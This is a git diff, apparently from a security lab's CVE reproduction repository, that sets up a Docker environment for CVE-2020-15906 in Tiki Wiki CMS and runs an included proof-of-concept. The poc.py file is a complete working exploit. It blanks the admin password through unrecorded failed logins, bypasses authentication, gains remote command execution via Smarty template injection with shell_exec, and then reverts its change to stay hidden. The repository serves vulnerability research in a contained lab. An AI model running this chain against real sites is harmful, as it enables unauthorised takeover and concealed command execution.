ucsb-seclab · yujianll · Nov 20, 2024 · olegbck · Nov 21, 2024 · olegbck
diff --git a/CVE-2020-15906/cvex.yml b/CVE-2020-15906/cvex.yml
@@ -0,0 +1,5 @@
+blueprint: ubuntu2204
+ubuntu:
+  playbook: ubuntu.yml
+  command:
+    - "python3 /opt/Tiki-wiki-CMS/poc.py 127.0.0.1:8080 / id"
diff --git a/CVE-2020-15906/data/docker-compose.yml b/CVE-2020-15906/data/docker-compose.yml
@@ -0,0 +1,26 @@
+version: '3'
+services:
+ web:
+   image: vulhub/tikiwiki:21.1
+   entrypoint: 
+    - bash
+    - /docker-entrypoint.sh
+   depends_on:
+    - db
+   ports:
+    - "8080:80"
+   environment: 
+    - TIKI_DB_DRIVER=pdo
+    - TIKI_DB_HOST=db
+    - TIKI_DB_USER=root
+    - TIKI_DB_PASS=root
+    - TIKI_DB_NAME=tikiwiki
+   volumes:
+    - "./docker-entrypoint.sh:/docker-entrypoint.sh"
+ db:
+   image: mysql:5.7
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=tikiwiki
+   ports:
+    - "3306:3306"
diff --git a/CVE-2020-15906/data/docker-entrypoint.sh b/CVE-2020-15906/data/docker-entrypoint.sh
@@ -0,0 +1,13 @@
+#!/bin/bash
+
+wait-for-it db:3306 -- echo "database is up"
+
+if [[ ! -e ./db/local.php ]]; then
+    php console.php database:configure --host db -- root root tikiwiki
+    php console.php database:install
+    php console.php users:password -- admin vulhub
+    php console.php index:rebuild
+    php console.php installer:lock
+fi
+
+apache2-foreground
diff --git a/CVE-2020-15906/data/poc.py b/CVE-2020-15906/data/poc.py
@@ -0,0 +1,84 @@
+import requests
+import sys
+import re
+
+
+def auth_bypass(s, t):
+    d = {
+        "ticket" : "",
+        "user" : "admin",
+        "pass" : "trololololol",
+    }
+    h = { "referer" : t }
+    d["ticket"] = get_ticket(s, "%stiki-login.php" % t)
+    d["pass"] = "" # blank login
+    r = s.post("%stiki-login.php" % t, data=d, headers=h)
+    r = s.get("%stiki-admin.php" % t)
+    assert ("You do not have the permission that is needed" not in r.text), "(-) authentication bypass failed!"
+
+def black_password(s, t):
+    uri = "%stiki-login.php" % t
+    # setup cookies here
+    s.get(uri)
+    ticket = get_ticket(s, uri)
+    d = {
+        'user':'admin', 
+        'pass':'trololololol',
+    }
+    # crafted especially so unsuccessful_logins isn't recorded
+    for i in range(0, 51):
+        r = s.post(uri, d)
+        if("Account requires administrator approval." in r.text):
+            print("(+) admin password blanked!")
+            return
+    raise Exception("(-) auth bypass failed!") 
+
+def get_ticket(s, uri):
+    h = { "referer" : uri }
+    r = s.get(uri)
+    match = re.search('class="ticket" name="ticket" value="(.*)" \/>', r.text)
+    assert match, "(-) csrf ticket leak failed!"
+    return match.group(1)
+
+def trigger_or_patch_ssti(s, t, c=None):
+    # CVE-2021-26119
+    p = { "page": "look" }
+    h = { "referer" : t }
+    bypass = "startrce{$smarty.template_object->smarty->disableSecurity()->display('string:{shell_exec(\"%s\")}')}endrce" % c
+    d = {
+        "ticket" : get_ticket(s, "%stiki-admin.php" % t),
+        "feature_custom_html_head_content" : bypass if c else '',
+        "lm_preference[]": "feature_custom_html_head_content"
+    }
+    r = s.post("%stiki-admin.php" % t, params=p, data=d, headers=h)
+    r = s.get("%stiki-index.php" % t)
+    if c != None:
+        assert ("startrce" in r.text and "endrce" in r.text), "(-) rce failed!"
+        cmdr = r.text.split("startrce")[1].split("endrce")[0]
+        print(cmdr.strip())
+
+def main():
+    if(len(sys.argv) < 4):
+        print("(+) usage: %s <host> <path> <cmd>" % sys.argv[0])
+        print("(+) eg: %s 192.168.75.141 / id"% sys.argv[0])
+        print("(+) eg: %s 192.168.75.141 /tiki-20.3/ id" % sys.argv[0])
+        return
+    p = sys.argv[2]
+    c = sys.argv[3]
+    p = p + "/" if not p.endswith("/") else p
+    p = "/" + p if not p.startswith("/") else p
+    t = "http://%s%s" % (sys.argv[1], p)
+    s = requests.Session()
+    print("(+) blanking password...")
+    black_password(s, t)
+    print("(+) getting a session...")
+    auth_bypass(s, t)
+    print("(+) auth bypass successful!")
+    print("(+) triggering rce...\n")
+    # trigger for rce
+    trigger_or_patch_ssti(s, t, c)
+    # patch so we stay hidden
+    trigger_or_patch_ssti(s, t)
+
+if __name__ == '__main__':
+    main()
diff --git a/CVE-2020-15906/ubuntu.yml b/CVE-2020-15906/ubuntu.yml
@@ -0,0 +1,57 @@
+---
+- name: Install CVE-2020-15906 PoC
+  hosts: all
+  become: yes
+  tasks:
+    - name: Update apt package index
+      apt:
+        update_cache: yes
+
+    - name: Ensure Docker is installed
+      apt:
+        name: docker.io
+        state: present
+
+    - name: Install a list of packages
+      ansible.builtin.apt:
+        pkg:
+        - docker-buildx
+        - docker-compose-v2
+
+    - name: Ensure Docker service is started and enabled
+      service:
+        name: docker
+        state: started
+        enabled: yes
+
+    - name: Verify Docker Compose installation
+      command: docker compose version
+      register: compose_version
+
+    - debug:
+        msg: "Docker Compose version: {{ compose_version.stdout }}"
+
+    - name: Create /opt/Tiki-wiki-CMS
+      file:
+        path: /opt/Tiki-wiki-CMS
+        state: directory
+
+    - name: Copy docker-compose.yml
+      ansible.builtin.copy:
+        src: ./data/docker-compose.yml
+        dest: /opt/Tiki-wiki-CMS
+
+    - name: Copy docker-entrypoint.sh
+      ansible.builtin.copy:
+        src: ./data/docker-entrypoint.sh
+        dest: /opt/Tiki-wiki-CMS
+
+    - name: Copy poc
+      ansible.builtin.copy:
+        src: ./data/poc.py
+        dest: /opt/Tiki-wiki-CMS
+
+    - name: Start Docker Compose services
+      command: docker compose up -d --build
+      args:
+        chdir: /opt/Tiki-wiki-CMS